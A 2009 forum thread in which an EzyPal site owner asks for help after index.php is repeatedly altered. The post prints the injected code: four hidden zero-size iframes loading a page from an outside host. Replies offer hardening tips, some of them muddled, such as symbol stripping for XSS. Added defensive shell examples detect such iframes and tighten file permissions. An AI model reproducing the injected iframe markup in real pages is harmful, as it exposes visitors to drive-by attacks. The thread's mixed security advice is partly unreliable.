
EzyPal Hacking

Discussion in 'PHP & Perl' started by olimpiu_stefan, Dec 5, 2009.

  1. olimpiu_stefan

    Hi guys. I have ONE big problem.

    For the guys who use ezypal script:

    I was hacked 5 times. And the file that was modified is index.php.

    Like this:

    PHP:
    <?php

    error_reporting(E_ERROR);

    define("EZY_VALID", true);

    require_once('includes/configuration.php');
    require_once('includes/error.php');
    require_once('includes/mysql.php');
    require_once('includes/compatibility.php');
    require_once('includes/vars.php');
    require_once('includes/functions.php');
    require_once('includes/mail.php');

    if (ini_get('safe_mode') == 'Off') ini_set('magic_quotes_gpc', 1);

    if ($config['store_active'] == 'true' || SessionLevel() == 2) {
        // Route on the "do" query parameter; default to the home page
        if (isset($_GET['do'])) $action = $_GET['do'];
        else $action = 'home';

        if ($action != 'file') {
            ob_start();
            include('includes/template.php');
            ob_end_flush();
        }
        else include('file.php');
    }
    else include('offline.html');

    require_once('includes/final.php');

    //=====================[ EZYPAL IS NOT FREE SOFTWARE ]======================//
    ?><iframe src="http://odmarco.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://odmarco.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://odmarco.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://odmarco.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

    In the footer they put an IFRAME.

    Please, how can I resolve this problem?
    But PLEASE don't tell me to buy it.

    Thanks
     
  2. cyklotrial

    If it's a nulled script, you probably have a backdoor in one (or more) files.
    You have to find it and remove it.

    To find it you should check your server logs.
     
  3. Crooker

    There are loads of ways your site might get hacked.
    First there are some variables that have little to do with your own website, for instance:

    * Vulnerability of your home PC / no properly updated virus scanners. Think key loggers, infected FTP software, browser hacks.
    * Shared hosting. Maybe the vulnerability is not with you but with your neighbor on the server. A hacked site isn't necessarily a scripting issue.

    Then there are also some other factors that come into play.
    Script vulnerabilities. Be it via PHP vulnerability or scripting errors.
    To prevent XSS:
    A simple thing to protect yourself is to filter out any symbols from text input.
    This can easily be done by using preg_replace to replace the symbols with nothing, or just return an error message to the user saying symbols are not allowed.
    Second is to encode input to SQL and decode on output. That way the code can never become active inside because it's scrambled.
    PHP offers escapeshellarg() and escapeshellcmd() to perform encoding before calling methods:
    Code:
    http://www.php.net/manual/en/function.escapeshellarg.php
    Code:
    http://www.php.net/manual/en/function.escapeshellcmd.php
    Once a shell is installed it will change your files, inputting for instance an iframe, which you had.
    When you remove the iframe you haven't removed the shell, so when you continue, the shell is also going to continue its work and the iframe will keep on coming back.
    There are lots of tutorials you can find via Google on how to remove one.
    Or on how to find one in the first place.


    Another thing PHP is flawed with is that it is very vulnerable when exposed to the public directly.
    For instance index.php.
    A way to work around this is to not allow access to the core PHP files.
    But then logically no one would have access to your site.
    You can generate HTML or XML files from your PHP core, effectively making an HTML mirror of the PHP file.
    This has a few advantages. Your site load will be lighter and your page will be faster because it doesn't have to load any SQL data.
    Plus it's very hard to hack: due to its pure simplistic nature, you limit the hacker's possibilities to a few parameters that are easy for you to control.
    See the image for an example of how it works.

    [IMG]

    You can even generate PHP files from your core folder. So you can refresh a script each morning or a certain file every time someone has made a comment.

    You can do any of the above or not, but there is still something that you must do regardless, and that is: "Make Backups"!
     
    • Thanks Thanks x 1
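
Added example, not part of the thread: one way to check the point made in the post above, that deleting the iframe leaves behind whatever keeps re-inserting it. It counts zero-size iframes per file and diffs the live tree against a known-good backup; the sample tree, its file names and the `injected.example` host are constructed.

```shell
#!/bin/sh
# Added example (not from the thread). Paths and file contents are constructed.

# ERE for an <iframe> tag whose width or height is 0, quoted or unquoted.
HIDDEN_IFRAME="<iframe[^>]*(width|height)=[\"']?0([^0-9.%]|\$)"

# Print "COUNT PATH" for every text file under $1 that holds such iframes.
# Assumes paths contain no ':' (grep separates path and match with it).
count_hidden_iframes() {
    grep -rIoiE "$HIDDEN_IFRAME" "$1" |
        awk -F: '{ c[$1]++ } END { for (f in c) print c[f], f }' | sort -k2
}

# Compare a known-good copy ($1) with the live tree ($2). Lists files that
# differ and files present on one side only; a dropped file shows up as
# "Only in <live dir>". diff exits 1 when it finds differences.
changed_since_backup() {
    diff -rq "$1" "$2" || [ $? -eq 1 ]
}

# Constructed sample: a clean tree and a tampered copy of it.
make_sample() {
    root=$(mktemp -d)
    mkdir -p "$root/clean/includes" "$root/live/includes"
    printf '<?php\necho "store";\n?>' > "$root/clean/index.php"
    printf '<?php\n// helpers\n' > "$root/clean/includes/functions.php"
    cp -R "$root/clean/." "$root/live/"
    # Same shape as the injection in the first post, with a placeholder host.
    tag='<iframe src="http://injected.example/" width=0 height=0 frameborder=0></iframe>'
    printf '%s%s' "$tag" "$tag" >> "$root/live/index.php"
    printf '<?php /* constructed stand-in for a dropped file */\n' \
        > "$root/live/includes/cache.php"
    echo "$root"
}

root=$(make_sample)
count_hidden_iframes "$root/live"
changed_since_backup "$root/clean" "$root/live"
rm -rf "$root"
```

The diff is only as trustworthy as the backup it compares against, so the clean copy should predate the first compromise.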
  4. Crooker

    olimpiu_stefan

    I may have a solution to your problem, PM me.
     
    Last edited: Dec 6, 2009
  5. shanelee

    I am looking for better threads about hacking. I am a noob on this. Can anyone help?
     
  6. revproxy

    remove write permission from your files, use:
    chmod 644
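
Added example, not part of the thread: the `chmod 644` advice above applied to a whole tree, with directories set to 755 so they stay traversable. It also lists what the owning account can still write, because 644 keeps the owner's write bit; the sample tree is constructed.

```shell
#!/bin/sh
# Added example (not from the thread); the sample tree is constructed.

# Files get 644 and directories 755. Directories need the execute bit to be
# entered, so a blanket "chmod -R 644" on the docroot would break the site.
lock_down() {
    find "$1" -type d -exec chmod 755 {} +
    find "$1" -type f -exec chmod 644 {} +
}

# Anything under $1 that group or other can still write to.
loosely_writable() {
    find "$1" \( -perm -020 -o -perm -002 \) | sort
}

# 644 keeps the owner's write bit. If PHP runs as the account that owns the
# files ($2, name or numeric uid), it can still rewrite every path printed.
writable_by_owner() {
    find "$1" -type f -user "$2" -perm -200 | sort
}

# Constructed docroot with world-writable files and directories.
make_tree() {
    t=$(mktemp -d)
    mkdir -p "$t/includes"
    echo '<?php' > "$t/index.php"
    echo '<?php' > "$t/includes/functions.php"
    chmod 777 "$t" "$t/includes"
    chmod 666 "$t/index.php" "$t/includes/functions.php"
    echo "$t"
}

t=$(make_tree)
echo "before:"; loosely_writable "$t"
lock_down "$t"
echo "after (group/other):"; loosely_writable "$t"
echo "still writable by owner uid $(id -u):"; writable_by_owner "$t" "$(id -u)"
rm -rf "$t"
```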
     
  7. phpdevsami

    Disable writing.